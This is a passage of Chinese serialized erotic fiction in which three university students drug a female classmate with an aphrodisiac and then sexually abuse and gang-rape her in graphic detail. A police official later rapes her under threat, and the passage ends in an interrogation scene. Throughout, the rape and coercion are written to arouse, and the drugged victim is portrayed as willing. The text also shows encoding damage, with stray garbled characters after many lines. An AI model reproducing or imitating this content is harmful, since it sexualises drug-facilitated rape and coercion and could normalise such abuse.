      “我他媽的當然是說那支圓珠筆了!”

      三人又笑。

      “梁婉儀的玉體實在太美了,連屁眼都那么美,你們不想插嗎?”

      “再說,她自己不是也插過嗎?”

      “對了,你用圓珠筆插她屁眼時,她說什么來著……”

      三人又狂笑。

      “啊,胖哥哥,你壞死了,”傻胖子學著梁婉儀的腔調︰“你不要搞我的屁眼啦!”

      三人笑得越來越放肆。陳卓聽倒這里又憤怒又心痛。心目中女神一樣的美少女不僅被三個流氓輪流搞了她的生殖器,居然連肛門也被他們肆意污辱,天??!

      “她居然叫你胖哥哥!”宋狗狂笑著說︰“我發現,越是高傲和正經的女孩子,一旦意亂情迷時,就顯得越撩人,越嫵媚?!?br>
      “這算什么發現啊,本來就是事實?!?br>
      “我還有一個發現,就是陳卓越看不起我們,這件事對他的打擊就越大!”

      “嘿嘿,這正是江龍的目的?!卑⒘髡f︰“這么漂亮的女孩,他不搞,送給我們搞,為什么?他就是知道陳卓看不起我們,所以用這個辦法羞辱他?!?br>
      “那陳卓現在到底知不知道?”

      “管他呢!我敢打賭,他就是知道也裝不知道,他才不見我們的得意樣子呢!”

      陳卓在床上緊緊握住拳頭。又憤怒、又無奈,他不得不承認,江龍的目的達到了!

      “對了,阿流,龍哥剛才打電話說什么?”

      “嘿嘿,告訴你們樂死你們,江龍剛才打電話給我,對我說,他給梁婉儀吃的春藥是日本最先進的,有一種‘藥力保留’效力,喝了春藥的少女,無論她多么矜持、多么高傲,都會不可遏制地渴望同她見到的男人做愛!之后,在大約三天的時間內,她會對藥力第一次發作時干過她的男人產生不可遏制的情欲。也就是說,這三天里,梁婉儀就像是瘋狂愛上我們了一樣,我們的任何要求她都會毫無保留地答應,無論她多么高傲,都會放下架子,拜倒在我們面前!”

      阿流此話說完,傻胖子和宋狗幾乎要振臂歡呼。而陳卓幾乎吐血。什么!這太可怕了,這才是江龍更可怕的目的吧!徹底地羞辱婉儀,徹底地羞辱他!

      “太好了,太不可思議了!”

      “江龍萬歲!”

      三個得志的小流氓歡呼著。

      陳卓咬著牙齒,緊緊地攥著拳頭,緊緊地……

      第八回 “愛”上三個流氓的高傲美少女

      第二天一早是政治理論課,這是大課,陳卓他們系同梁婉儀她們系一起上。

      快上課時,陳卓走進大教室,看見阿流他們坐在后排,正在興奮地議論著什么,然后好像是在抓鬮,結果傻胖子歡呼了一聲。

      陳卓坐下,不一會兒,梁婉儀穿著緊身的牛仔褲翩然走了進來,天??!這個純潔的少女已經不再是處女了!陳卓心痛地想。

      只見,傻胖子站起來,嬉皮笑臉地到梁婉儀跟前說話。梁婉儀看到傻胖子,高傲的神情立刻消失,變得又溫順又羞澀,完全是一個少女看見自己心上人的表情。傻胖子好像提出什么要求,梁婉儀羞澀地點點頭,然后兩人竟然雙雙悄悄從大教室的后門走了。這種大課,本來就不點名的。

      陳卓暗說不好,一定是抓鬮輪到傻胖子先去“享用”婉儀。陳卓想到這里,不顧學生干部以身作則,也從后門溜了出去。

      早晨第一節課時的校園靜悄悄的。梁婉儀順從地跟著傻胖子,傻胖子只有1米60那么高,而梁婉儀卻是那么修長,兩人極不協調。

      傻胖子領著梁婉儀進了他們的寢室樓,走進了他們寢室,關上門。

      陳卓心急如焚,此時的寢室樓幾乎沒人,寢室里本來就住他們四個,傻胖子可以在里面對“愛”著他的梁婉儀為所欲為!陳卓悄悄地接近自己的寢室門口,趴在門上聽。

      “婉儀妹妹,你今天為什么穿牛仔褲呢?穿裙子多好!”是傻胖子的聲音。

      “就是為了不讓你占便宜啦!啊……別嘛!你再這樣,人家以后不來你寢室了?!边@是梁婉儀的聲音。

      “這皮帶扣怎么解不開?”傻胖子帶著喘息的聲音。

      畜生!陳卓暗罵。

      “嘻嘻,就不讓你解開嘛!??!不!不要!”梁婉儀俏皮的嬌嗔。

      “解開嘍!”傻胖子的歡呼。

      陳卓著急地透過鎖孔朝里看,只見嬌俏修長的梁婉儀正被矮胖的傻胖子屁股朝上橫抱在床上,傻胖子正奮力剝梁婉儀的緊身牛仔褲,而梁婉儀則撩人地亂蹬著兩條長腿掙扎。這是怎樣不協調的景像啊,一個修長高貴的美麗少女在一個矮胖猥瑣的男生的逗弄下嬌滴滴地扭動。

      梁婉儀穿著極緊身的牛仔,緊緊包裹著她纖細的長腿和豐圓的臀部。傻胖子費盡了力,盡管已經解開梁婉儀的皮帶扣,但在她俏皮的掙扎下卻無法將褲子剝下,急得他直喘。而梁婉儀絲毫沒有了以往的高傲和矜持,竟然像個溫順的小女生般被傻胖子擺弄。

      “不要啦,你們寢室里的同學回來怎么辦?”梁婉儀邊扭動屁股,邊將纖細的小手伸到腰際抵抗。

      傻胖子哪里肯依!自己一直用來做第一手淫對象的美少女梁婉儀此刻再次溫香軟玉地躺在自己懷里掙扎!傻胖子伸手到梁婉儀撅起的俏麗屁股上隔著牛仔褲粗暴地亂摸。

      “嘻嘻,婉儀妹妹的屁股真肉感!”傻胖子道,拚命地將手從梁婉儀的后面往她胯間伸。

      當然肉感了,要知道,這可是全校男生夢寐以求的美少女的屁股??!

      梁婉儀被傻胖子亂摸屁股,只有用手去抵抗。傻胖子趁機又用另一只手去解婉儀的褲子。梁婉儀的皮帶本已經被他解開,此刻被他狠命地拉,立刻露出了她腰際雪白的肌膚和白色三角褲的一部分。受了視覺刺激的傻胖子更是用力扒梁婉儀的褲子。

      眼看梁婉儀的屁股馬上要露出來,陳卓大力地在門上猛擊了兩下,然后迅速逃入旁邊廁所。過了一會兒,寢室門開。

      “真可怕,以后別在你們寢室亂來了啦!”已經束好皮帶的梁婉儀從寢室出來。

      “不要緊的,可能是哪個推銷員?!鄙蹬肿语@然正在興頭上。

      “我走了啦!”梁婉儀說。

      “你走我就生氣了!”傻胖子擺架子。

      “別嘛!”梁婉儀口氣立刻軟了。

      “那就來吧!”傻胖子又將手伸向梁婉儀的腰際,梁婉儀掙扎,傻胖子順勢將她一把推進盥洗室。

      “真的不能脫,會被別人看見的!”

      “現在沒人,都在上課呢!”

      此刻由于梁婉儀是站著,加上她本來就不是拼了命的掙扎,所以隨著梁婉儀的一聲嬌嗔,傻胖子終于將梁婉儀的緊身牛仔褲連同內褲一起剝到了膝蓋。

      天??!潔白如玉的兩條大腿裸呈在盥洗室窗戶照進來的柔和光線下,因羞澀而刻意夾緊雙腿的景像無比撩人,加上渾圓豐滿的兩片屁股和下腹一叢淡黑色的陰毛,讓任何男人都會無法遏制沖動!

      廁所和盥洗室一門之隔,陳卓躲在門口看了個清楚。他立刻猛烈地勃起,常年的暗戀此刻帶給他巨大沖動,幾乎讓他忘了她的夢中情人是在被一個丑陋的胖子玩弄!當他意識到時,他早已經沒有沖出去制止的勇氣。因為他決不想讓傻胖子他們知道他知道他們奸淫過他的心上人!因為這會讓他們得意,讓他們滿足。也或許是因為他其實心里不想讓這撩人的一幕停止。

      傻胖子的手立刻兇猛地伸向梁婉儀的下體,緊身牛仔褲繃在梁婉儀的膝蓋,加上梁婉儀的小手拚命抵抗,傻胖子無法將手伸到梁婉儀的胯間,他于是又繞到她后面用手扒開她的兩片屁股。梁婉儀是背對著陳卓這邊,所以陳卓可以清晰地看見傻胖子肥大的手扒開梁婉儀豐滿的屁股,用粗大的食指摳弄梁婉儀的肛門。

      陳卓開始喘息。

      “??!”梁婉儀嬌喘︰“別、別搞我這里嘛!”

      “搞你哪里???”傻胖子故意問。

      “搞我的……屁眼啦!你壞死了,上次被你在放映廳插了支筆,人家痛了好幾天呢!”梁婉儀啐道。

      “那就讓我搞你的小洞洞吧!”傻胖子說著,又用力將梁婉儀的牛仔褲剝到腳踝。這樣,梁婉儀的美腿就全部裸露了出來,陳卓又看見了梁婉儀曲線優美的小腿。

      “啊,不可以,這里不可以……”梁婉儀用僅有的理智抗拒。

      “我受不了了!我要,我要!”傻胖子一只手伸進梁婉儀衣服里去摸弄她的乳房,另一只手拚命亂摸梁婉儀的屁股和下身。

      “真的不行啦!”梁婉儀掙扎。傻胖子繞到梁婉儀背后,迫使她彎下腰,這樣他可以從后面摸到梁婉儀的小洞洞,察覺了他的企圖的梁婉儀掙扎著逃開。天??!這是什么景像??!上二大男生們夢寐以求的美少女此刻竟然赤裸著下身,褲子纏在腳踝上笨拙地跑動!

      當然,她很快又被傻胖子捉住。

      “真的不行啦,你又沒有……沒有那個……懷孕了怎么辦?”梁婉儀嬌嗔。

      “那……那這樣吧,”傻胖子突然靈機一動,道︰“那你替我吸出來?!?br>
      陳卓聽到這里恨不得出去揍死傻胖子,他竟然想要那樣高貴圣潔的少女替他口交!這簡直是太心了!可是他沒有勇氣沖出去,他只是貪婪地看著梁婉儀裸露的美腿。

      “不會的,”陳卓對自己說︰“梁婉儀才不會答應呢,她怎么會用她高貴的嘴去舔傻胖子骯臟的陰莖呢?不會的!”

      “什么吸出來?”梁婉儀不解地問。

      “就是用你的小嘴含著我那東西……”傻胖子解釋。

      “不行啦,羞死人了!”梁婉儀嬌叱。

      “那我生氣了!”傻胖子裝作生氣道。

      “別生氣啦,我讓你摸我,好不好?”平素高傲無比的梁婉儀立刻低聲下氣地求傻胖子。

      “不行!”傻胖子堅決地說。

      “讓我做那事,太……太難為情了,胖哥哥,我是毫無保留地愛你的,求你給我留點尊嚴吧!我讓你摸我,好不好嘛!”梁婉儀一邊哀求,一邊解開了自己的衣服,里面是一件緊身的內衣。梁婉儀將自己的內衣撩起,露出白色的花邊胸罩。梁婉儀將雙手優雅地伸到背后,解開了胸罩的扣子,一對潔白高聳的乳房立刻裸露了出來。兩顆粉紅色的乳頭是那樣嬌嫩,顯然沒有怎么被人撫弄過。

      天??!曾經是那樣高傲、不可侵犯的梁婉儀,竟然主動裸露出自己的胸部求別人撫摸!傻胖子當然口水直流,他伸出肥大的手,一手一個握住了梁婉儀的乳房,粗暴地摸弄。

      陳卓看得又是憤怒,又是欲火中燒。憤怒的是傻胖子是那么輕蔑和下流地玩弄著梁婉儀的乳房,他不僅粗暴地亂摸,甚至淫笑著捏住梁婉儀兩顆柔嫩的乳頭向外亂拉,可憐梁婉儀形狀如桃實般美麗的乳房被拉得成了尖尖的圓錐。

      傻胖子肆意地玩弄了一會兒后說道︰“婉儀妹妹,還是不行,我越來越興奮了!你還是替我吸出來吧!”其實婉儀赤著下身和乳房任由他摸弄已經很令傻胖子滿足,但是他還是想看看高傲的梁婉儀究竟肯任他污辱到什么地步。

      “婉儀,別答應他??!”陳卓心里呼喚。

      “那……那好吧!”梁婉儀終于羞澀地說。陳卓頓時痛苦欲死。

      而傻胖子見梁婉儀真的答應,簡直不敢相信自己的耳朵。其實他提出這個要求時沒指望如此高傲的梁婉儀真的會答應。春藥真是太神奇了!天??!想一想!梁婉儀替我口交??!這太幸福了!恐怕我是她口交的第一個男人吧?嘿嘿,阿流第一個插了她的小洞,我可以第一個插她的小嘴!

      想到此處,傻胖子迫不及待地脫下褲子,露出布滿了肥肉的便便大腹,兩條長滿了粗黑腿毛的肥短腿和一根肥大、早已經漲得紫硬的肉棒。肉棒周圍是茂盛的濃黑的雜亂的陰毛,丑陋的龜頭上明顯沾著殘余的尿水,周圍包皮縮入去的地方滿是包皮垢!散發著一股幾乎陳卓都能聞到的惡臭。

      “來吧,婉儀妹妹!”傻胖子興奮地站在那里,等著成為梁婉儀第一個口交的男生這一“偉大”時刻的到來。

      在陳卓心痛的注視下,美麗高傲的梁婉儀羞澀而優雅地理一理自己紛亂的秀發,彎起修長赤裸的美腿,跪倒在了傻胖子的面前,美麗的面孔正對著傻胖子那翹起的巨棒。

      梁婉儀略一猶豫,不知是她高傲的本性和理智同烈性春藥做了最后的掙扎,還是傻胖子骯臟而惡臭的肉棒令冰清玉潔的她感到一陣心,然后她湊過去,張開櫻桃小嘴,含住了傻胖子骯臟的肉棒。是的,她含住了那根肉棒,用她的嘴,用那張所有男生都幻想能夠吻上一吻的小嘴,可是此刻卻含住了一個丑陋的胖子的性器。

      “不!”陳卓心里發出了絕望的吶喊。

      傻胖子只感到一陣溫熱包圍了自己的性器官,一股強烈的生理快感和心理的滿足感沖上了心頭!梁婉儀替我口交了!他恨不得到大操場上去喊︰梁婉儀替我口交了??!

      “啊……啊……”傻胖子滿足地呻吟著︰“婉儀妹妹,這是不是你第一次含別人的肉棒???”

      跪在那里,嘴里滿滿地塞著肉棒的梁婉儀輕輕點了點頭。

      “你要……啊……用舌頭舔……啊……對……就是這樣……還要吞吐我的肉棒,就像我的肉棒在你的小洞里插進拔出一樣……啊……啊……對對……就這樣……對對……啊……啊……”

      在傻胖子的指導下,梁婉儀用小舌頭舔著傻胖子的龜頭,還賣力地吞吐著他的肉棒。

      陳卓心如刀絞地看著這一切,心目中的女神跪在一個胖子的腳下,賣力地吞吐他的生殖器,長發隨著頭的晃動而微微飄動,撩撫在傻胖子肥大的肚子上,胸前裸露的兩個乳房隨著她身體的搖動而微微抖動。吞吐了一會兒肉棒之后,又在傻胖子的指導下去舔他的兩顆肉丸,然后再含住他的肉棒,傻胖子則滿臉幸福地呻吟著、呻吟著……

      “啊,婉儀妹妹,你太調皮了,再吮得重些……啊……婉儀妹妹……你好可愛……我要搞你……”傻胖子一邊享受,一邊也俯下身,用兩手去逗弄梁婉儀的乳頭,將她兩顆乳頭扯來扯去。

      可憐的梁婉儀畢竟是個少女,何況還是在春藥的控制下。她也逐漸產生了快感,竟然也慢慢可是發出嬌滴滴的呻吟。她嬌美的呻吟同傻胖子肆無忌憚的爽叫融合成極不和諧的音律,回蕩在男生寢室的盥洗室里。

      在這個盥洗室里,曾經記錄了無數男生對梁婉儀的談論、評價、贊嘆,渴求或者是性幻想,而今天,這個盥洗室迎來了她本人,并且記錄下了她裸露的兩條玉腿,她高聳豐滿的玉乳,她撩人魂魄的嬌喘呻吟,還有她這輩子第一次替人口交的景像……

      兩人的呻吟終于達到高潮,只聽傻胖子極爽地大喝一聲,將一股渾濁的精液統統噴進梁婉儀的小嘴里。梁婉儀在他的要求下全部喝下,然后舔干凈傻胖子的肉棒。

      “這下滿足了吧!”梁婉儀帶上胸罩,拉起褲子后,嗔怪地瞪了一眼在拉褲子的傻胖子說。這本來是多么撩人俏皮的一幕??!如果是一對俊男靚女的話,可是……

      就在這時,走廊里響起了腳步聲。梁婉儀驚慌不已,卻又沒地方躲。兩個人出現在盥洗室門口,正是阿流和宋狗,傻胖子和梁婉儀都松了一口氣。

      “嘿嘿,你們兩個倒開心,讓我們參加一個怎么樣?”阿流道。

      “婉儀妹妹,你太過份了,怎么同這個傻胖子好,不同我好?”宋狗妒忌地說。

      “是他,逼我嘛!”梁婉儀嬌羞地說。

      “嘿嘿,婉儀妹妹可好了,剛剛給我吹過蕭呢!”傻胖子得意地說。

      “哎呀,羞死人了,別說嘛!”梁婉儀滿臉通紅。

      “什么?我也要,我也要!”宋狗和阿流爭著說。

      “既然這樣,我們就趁這個難得的機會,同婉儀妹妹好好地親熱親熱吧!”傻胖子說著抱起梁婉儀,往寢室走去,宋狗和阿流跟了進去。隨著梁婉儀的一聲嬌叫,門被“乒”地關上了。陳卓又跟到寢室門口偷看。

      只見三個流氓一起將梁婉儀剛剛穿好的牛仔褲和衣服、胸罩統統剝去,梁婉儀頃刻之間便赤身裸體地站在了三人中間。梁婉儀羞澀地用手掩住胸部和下身,剛才的口交和被傻胖子摸弄乳頭,終于完全激發了春藥的效力,梁婉儀已經完全迷失了自己!

      “你們不要……這樣三個一起搞嘛,人家……人家……羞死了!”梁婉儀嬌媚地嬌嗔。

      三個淫棍哪里會顧這些,扯開梁婉儀遮掩的玉藕般的手臂。傻胖子伸出兩只肥手去擰梁婉儀的乳頭,阿流則吻上了婉儀的芳唇,宋狗則毫無客氣地摸婉儀的陰戶。

      “你們三個不要啦!”婉儀用力推開他們,嬌媚地說。

      “人家……人家是喜歡你們……可是人家也是個羞澀的女兒家呀!你們三個一起這么搞我,人家受不了嘛!你們不要以為我喜歡你們,就對我為所欲為,人家……人家要不睬你們了!”

      梁婉儀這話分明是撒嬌,不過阿流還是停下說︰“那婉儀妹妹,你想我們怎么搞你???”阿流覺得還是這樣比較有情趣。

      梁婉儀羞澀地轉過臉,輕聲說︰“你們脫光衣服,乖乖地站好,我……一個一個地伺候你們?!?br>
      梁婉儀說這話時嬌羞無限,令三人神魂顛倒,連聲同意。

      三個惡棍立刻將自己也脫光,挺著雞巴說︰“我先,我先!”

      梁婉儀想了想,說︰“我在你們中間跳個舞,跳到誰面前就伺候誰吧!”

      三人一聽一代美女梁婉儀肯裸體跳舞,當然同意。

      只見梁婉儀便赤身裸體地轉圈跳舞,一邊唱道︰“我是一個懷春的少女,愛上了校園里的三個美少年,我為他們朝思夜又想,我為他們小穴濕了又濕?!绷和駜x唱完正好聽在阿流旁邊。

      “阿流哥哥,你要我怎么伺候你???”梁婉儀嬌媚地說。

      阿流沒想到梁婉儀竟能唱出這么淫蕩的歌曲,興奮得想嚎,他道︰“婉儀妹妹,我要你屁眼里插根火腿腸替我口交!”

      梁婉儀嗔怪地瞪了阿流一眼︰“你們男生啊,就知道欺負我們女生,為什么老是打我那個骯臟的地方的主意嘛!”

      “因為婉儀妹妹那里長得太漂亮了!”阿流說。

      梁婉儀咯咯地笑了︰“什么嘛,那里男生女生不是都一樣嘛!”

      阿流聽到這里,眼珠一轉道︰“婉儀妹妹,不一樣的,你們女孩的屁眼又香又美,我們男生的屁眼都臭臭的,婉儀妹妹,你肯不肯替我把屁眼舔干凈???”

      陳卓在門外幾乎昏倒。

      “你們男生啊,就是不衛生?!绷和駜x嬌柔道。

      “那婉儀妹妹你肯不肯?”阿流問。

      “怎么會不肯呢!你是我的……第一個男人,”梁婉儀滿臉柔情地說︰“只要你珍惜我、疼我,我什么都肯為你做!”

      阿流樂得差點昏倒,而陳卓卻咬牙切齒。

      阿流立刻躺到床上,掰開腿。梁婉儀走到床邊,跪下,伸出嫩白的玉手,扒開阿流的屁股,然后將臉湊近他的屁股。她伸出小舌頭,舔起了阿流的屁眼。

      “真的很臟呢!”婉儀認真地舔舐,阿流則爽得大叫。

      婉儀認真地舔了五、六分鐘,在宋狗和傻胖子急切地反對下停止。

      “該我了,該我了!”兩人都叫。

      “我剛才給胖哥哥口交過了,下面讓我伺候宋狗哥哥吧!”

      宋狗大喜,道︰“婉儀妹妹,阿流第一個搞你的陰道,傻胖子第一個搞你的嘴巴,我要第一個搞你的屁眼?!?br>
      “又要搞人家這里,壞死了啦!”婉儀嬌嗔。她看了一眼宋狗紫漲的陽具,道︰“那么大,怎么塞得進去嘛!”

      “塞得進,塞得進!”宋狗連說。

      “我們可以幫忙!”傻胖子說。

      羞澀的婉儀猶豫了一番,終于點頭答應。她在他們的指導下,趴在地上,高高翹起她的豐臀,傻胖子和阿流狠狠扒開她的兩片屁股,阿流吐了兩口唾沫在婉儀美麗的菊花蕾上,然后便用他的雞巴狠命插入。梁婉儀窄緊的肛門雖然被筆插過,卻怎容得下宋狗粗大的雞巴!立刻痛得直哭,可是三人卻興奮異常。

      十分鐘后,梁婉儀的直腸里第一次留下了男人的精液。

      被干了屁眼的梁婉儀終于筋疲力盡,可是三個淫棍卻不放過她。他們接著對她進行了輪奸,梁婉儀被他們輪流用各種想得出的姿勢奸污。再后來,他們的獸欲基本已經滿足,開始對梁婉儀進行玩樂。他們將梁婉儀用各種姿勢綁起來,然后在她的陰道里塞火腿腸,在她的肛門里塞牙刷,把牙膏、餅干、啤酒、電池等東西塞入,倒入她的陰道和屁眼里,用衣架上的架子夾住她的乳頭。再后來,他們讓梁婉儀叼著他們的雞巴在寢室里赤裸地像母狗一樣爬來爬去,他們讓梁婉儀掰開兩腿躺在床上,用手撐開自己的肉縫,他們比賽誰能把花生米丟進去……

      兩小時后,三個流氓終于筋疲力盡。梁婉儀羞澀地穿好衣褲,說︰“哥哥們玩得開不開心???”

      “開心,開心,婉儀妹妹,你太好了!”三人連連說。

      “那我明天再陪你們玩吧!”梁婉儀說完走了出去,陳卓又躲入廁所。他看見梁婉儀走出去的時候,兩條長腿幾乎合不攏了!

      陳卓打開一個水龍頭,將自己的頭塞進去,冰涼的水沖著他的頭。

      五分鐘后,陳卓終于下定決心。他走進寢室。

      阿流他們正躺在床上回味,看見一臉殺氣的陳卓,立刻坐了起來。

      “喲,干什么?好像要殺人似的?!卑⒘鬏p蔑地說。

      “就是,像個落湯雞,洗頭沒帶毛巾??!”宋狗說。

      “請你們……”陳卓強忍怒火,輕輕說︰“請你們不要……這么羞辱她?!?br>
      “什么?你說誰???”阿流假裝聽不懂。

      “是梁婉儀,請你們……不要那樣羞辱婉儀?!标愖空f。

      “我們怎么羞辱她了嘛,都是她意的,對不對?”傻胖子說。

      “她,她是自的,可是你們已經可以隨時享受她的身體了,請你們,我求你們不要那么羞辱她。她是那么高傲的女孩,等藥性過去,她回憶起來,會……會受不了的?!标愖坑脦缀醢蟮恼Z氣說。

      “我們哪有羞辱她?”宋狗說。

      “你們……把她綁成那么羞恥的姿勢,還……還把東西塞進她……那里,還……還……讓她舔你們的肛門……求你們不要……”

      “喲,那這跟你有什么關系???”阿流笑說。

      “因為……因為……我喜歡婉儀!”陳卓終于說。

      這正是三個流氓想聽到的。

      “哎喲!真對不起呀,我們不知道?!?br>
      “是呀,知道的話,我就不讓你的心上人替我舔雞巴了!”

      “就是,早說嘛,我就不把火腿腸塞進她的屁眼里了!”

      “哈哈哈哈,哈哈哈哈!”

      三個流氓的笑聲回蕩在寢室里。

      這時只聽門口“當”一聲,然后是一陣腳步聲。四人都沖出去看,梁婉儀靚麗的背景在轉角一閃,消失了。陳卓飛奔而出。

      原來,那種春藥的所謂“藥力保留”主要不是看時間,而是看性交的次數。這個下午,梁婉儀被奸淫的次數差不多抵上正常的三天。她剛才回來拿她忘記的書,在門外聽到一切,猛然醒覺了。

      梁婉儀奔入學校西面的樹林,陳卓沖上去拉住她。

      “別管我,讓我死吧,別管我!”梁婉儀哭喊著。

      “婉儀,不要去死!忘掉痛苦,勇敢地生活下去!”陳卓說。

      “不,我還有什么必要活下去??!”梁婉儀淚流滿面。

      “婉儀,我愛你!”陳卓激動地說︰“不論怎樣我都愛你!”

      “不,陳卓,我是被人糟蹋得不成樣子的女孩了,我根本配不上你!”

      “婉儀,別這樣說,在我心中,你永遠純潔!”

      “不!不!”梁婉儀拚命搖頭。

      “婉儀,你不接受我,你也要為你父親想想,你付出了這么多代價,為了什么?”

      陳卓此話一出,梁婉儀終于冷靜下來。

      “答應我,好好活下去!”陳卓說。

      梁婉儀點點頭。

      “我會同江龍一直斗下去的,我一定會讓他得到應有的下場!”陳卓堅定地說。

      第九回 警局里的黑天暗日

      上海某警察局的一間寬敞的辦公室里。

      “嘿嘿,你小子還真說話算話?!毙虃煽频纳蚩崎L淫笑著對江龍說。

      “這個自然,逮捕梁益民還多虧了沈科長的大力幫忙嘛!”江龍笑道︰“好了,我就不耽誤沈科長的好事了。請沈科長好好享用吧!”江龍說完,便起身告辭。

      沈科長將江龍送走后,便逕自走到“等候室”的門口?!暗群蚴摇崩镒粋€修長嬌美的女孩。女孩穿著一套漂亮的連衣短裙和肉色的長絲襪,腳上穿著精美的高跟涼鞋。女孩正是梁婉儀,沈科長忍不住吞了一口唾沫。

      “請梁小姐跟我來吧?!彼麤_梁婉儀說道。

      梁婉儀急忙起身,跟著沈科長。她多么想立刻看到她的父親獲得自由??!

      “沈科長,我父親的身體怎么樣?”她問。

      “嗯,還可以,回家后好好調理調理吧?!鄙蚩崎L領著梁婉儀走進他的辦公室。梁婉儀進來后,他偷偷地將門鎖住。他的這間辦公室有良好的隔音設備,一旦門關上,里面就是有炸彈爆炸,外面也聽不見的。

      “梁小姐,請你在一些文件上簽字?!鄙蚩崎L一邊裝模作樣地說,一邊打量著眼前的美女。自從三年前他第一次看到梁婉儀十八歲拍的廣告后,就一直以梁婉儀作為手淫的對象。如今這個讓他魂牽夢繞的青春少女竟然就站在他的面前。這和他那中年肥胖的老婆和風月場上那些半老徐娘有著怎樣的反差??!嘿嘿!活到五十三歲,終于有機會玩一個這么美的少女。

      梁婉儀俯下身子,在文件上簽字,短裙遮蓋下的豐臀便翹了起來。沈科長哪里還忍得住,猛地從后面撲上去伸進梁婉儀的短裙里狂摸她渾圓的屁股。

      梁婉儀正在簽字,怎么會料到有這樣的事,猝不及防,竟立刻被沈科長將內褲剝到了膝蓋。她本能地夾緊兩腿,卻發現一只有力的手已經伸在她的胯間,手指插進了她的陰道。

      “啊,沈科長!”梁婉儀驚叫起來,她知道遇上了色狼︰“放開我,你這個畜生!??!”

      纖弱的梁婉儀在沈科長手里就像是一只小羊羔。在梁婉儀無力的捶打中,沈科長將梁婉儀按倒在辦公室的地上,將她的連衣短裙脫去,然后扯去她的胸罩和內褲。這樣梁婉儀全身便只剩下了肉色的長絲襪裹住她修長的玉腿。在梁婉儀拍的廣告里她也是穿著肉色的絲襪。

      “畜生,不要!”梁婉儀拚命扭動嬌軀和長腿,沈科長看見長年渴求的美少女的裸體,頓時欲火中燒,捉住她的纖纖小手,然后用嘴去舔婉儀的乳頭。婉儀哭喊著掙扎,卻無濟于事。

      沈科長亂咬亂舔了一番梁婉儀的乳頭后,拿出幾副手銬,將梁婉儀的雙手分開銬在辦公桌的兩只腳上,又將梁婉儀的兩條絲襪美腿扒開成幾乎120度,高高銬在辦公桌兩邊的兩只大文件柜的把手上。這樣,梁婉儀便完全喪失了掙扎的能力,腿間的羞處也毫無保留地呈給了這個五十三歲的色狼。

      天??!這辦公室應該是為人民服務,偵察破案的地方??!這手銬也是用來鎖住犯罪份子罪惡的雙手的,而此刻卻成為了一個老色狼玩弄,蹂躪一個美少女的工具。

      “嘿嘿嘿!”看著青春美少女被銬成這么羞恥的模樣,沈科長變態地笑了起來。

      “你,放開我!”梁婉儀淚流滿面,這些日子,她已經不是第一次裸體??墒窍襁@樣被人強行剝光,弄成這么羞恥的姿勢卻是頭一回。

      “放開我,聽到沒有!”梁婉儀嬌叱??墒腔卮鹚氖且恢贝謮训氖炙翢o忌憚地摸弄她的陰唇和陰蒂,是一張惡臭的嘴舔她的臉,她的唇,她的乳頭……最后是一根粗大的肉棒粗暴地捅入她依然很緊的少女的陰道……

      當沈科長喘息著,將他已經軟倒的陰莖拔出沾滿了他的精液的梁婉儀的陰道時,電話鈴響了起來。

      沈科長去聽,是北京來的女警官陳茹,她要求馬上提審兩個日本人。沈科長對這個厲害的女警有點怵,連忙連聲答應。

      放下電話,沈科長惡毒地對淚流滿面的梁婉儀道︰“你要是敢對別人說一個字,你就別想見到你活著的父親了!”說完松開了她。

      可憐的再度被羞辱的梁婉儀只得抽泣著穿好了內褲和衣裙……


      審訊一室里,英姿勃勃的女警官陳茹威嚴地站在日本人西村和小林面前。

      隔壁的審訊二室里,一個男孩和一個修長美麗的女孩正等在那里。他們正是李浩和肖揚。李浩握著肖揚的手安慰她︰“法律會主持正義的!”

      門開了,沈科長微笑著走了進來,李浩和肖揚站起身。

      “坐,坐吧!”沈科長故作和藹地說。他打量了肖揚一番,肖揚雖然只穿著簡單的牛仔褲和緊身上衣,可是嬌美的臉和修長的身材加上一個被強奸過的少女特有的幽怨的氣質,顯得無比令人心動。沈科長心說︰江龍這小子學校里的美女還真是多,剛讓我搞了一個,此刻又可以搞一個了。

      “沒關系,很高興你們相信法律,到這里來。你們放心吧,我們會主持正義的!”沈科長道貌岸然地說︰“現在我給你們分別錄口供,你先出去等吧?!鄙蚩崎L對李浩道。

      李浩哪里會知道這個沈科長是個禽獸,便走了出去,一個警察將他帶到“等候室”。

      李浩剛到等候室,便看見神情憔悴的梁婉儀向警局門口走去。

      “婉儀!”他叫住她︰“來看你父親?”

      梁婉儀微微點頭︰“你來做什么?”

      “我……我和肖揚來報案,我們決定了,任別人說閑話去,我不會嫌棄肖揚的,應該讓法律主持正義,讓江龍得到應有的下場?!崩詈普f。

      “那……肖揚她……在哪里?”

      “刑偵科的沈科長正在給她錄口供?!崩詈拼?。

      “什么?沈科長!不!”梁婉儀痛苦地驚叫。

      “怎么了,婉儀?”

      “快去!讓她出來,別讓她跟沈科長在一起!”

      “為什么?”

      “因為……因為……你別問這么多了?!绷和駜x漲紅了臉︰“總之快去救肖揚!”

      “到底怎么回事,什么叫救肖揚?”李浩不解。

      “那個沈科長不是好人!”

      “不會吧,他是公安人員??!”李浩還是不解。

      “唉,那個沈科長他……他……剛剛……剛剛強奸了我!”梁婉儀說完捂著臉沖出了警察局。

      “什么!”李浩大叫一聲沖向審訊室。

      “你們不交代,不會有好下場的,我勸你們還是同警方合作!”陳茹嚴厲地說。她邁動修長勻稱的腿在房間里走動。

      “你們沒證據,你們憑什么說我們綁架了那女孩?”西村道。

      “沒證據,你只能關押我們48小時?!毙×值?。

      陳茹憤怒地握著拳頭。

      “別生氣嘛,美麗的女警官,”西村道︰“我可以提供線索,不過有一個條件?!?br>
      “什么條件?”陳茹問。

      “就是陳警官你替我們每人口交三次!”西村說完便和小林一起哈哈大笑起來??墒撬麄冎粊淼眉靶α藘擅腌?,之后就是“哎喲哎喲”的慘叫聲,威風凜凜的陳茹狠狠地給他們每人兩個耳光。

      “陳警官,你打人!”西村嚎叫。

      “我要向你的上級告你!”小林道。

      “哼,你們這群喪盡天良的日本狗,走私了多少中國寶貴的文物,蹂躪了多少中國的少女,打死你們也活該!”陳茹氣憤地說。她滿臉通紅卻顯得更加嫵媚動人。比之肖揚、梁婉儀的嬌美,陳茹除了同樣苗條性感外,還多了一種健美。

      “嘿嘿,你說得不錯,可是你有證據嗎?你父親也死得冤??!”西村道。

      陳茹聽到此話,勃然大怒。這正是她的痛處,她不顧規定,沖上去又再狠狠地打小林和西村。這次她不打臉,因為打腫了會被看出來,她狠狠地揍他們的小腹。小林和西村帶著手銬,無法反抗,被打得嗷嗷直叫。

      “啊,陳警官,不敢啦!”

      “饒命啊,陳警官!”兩人哀號。

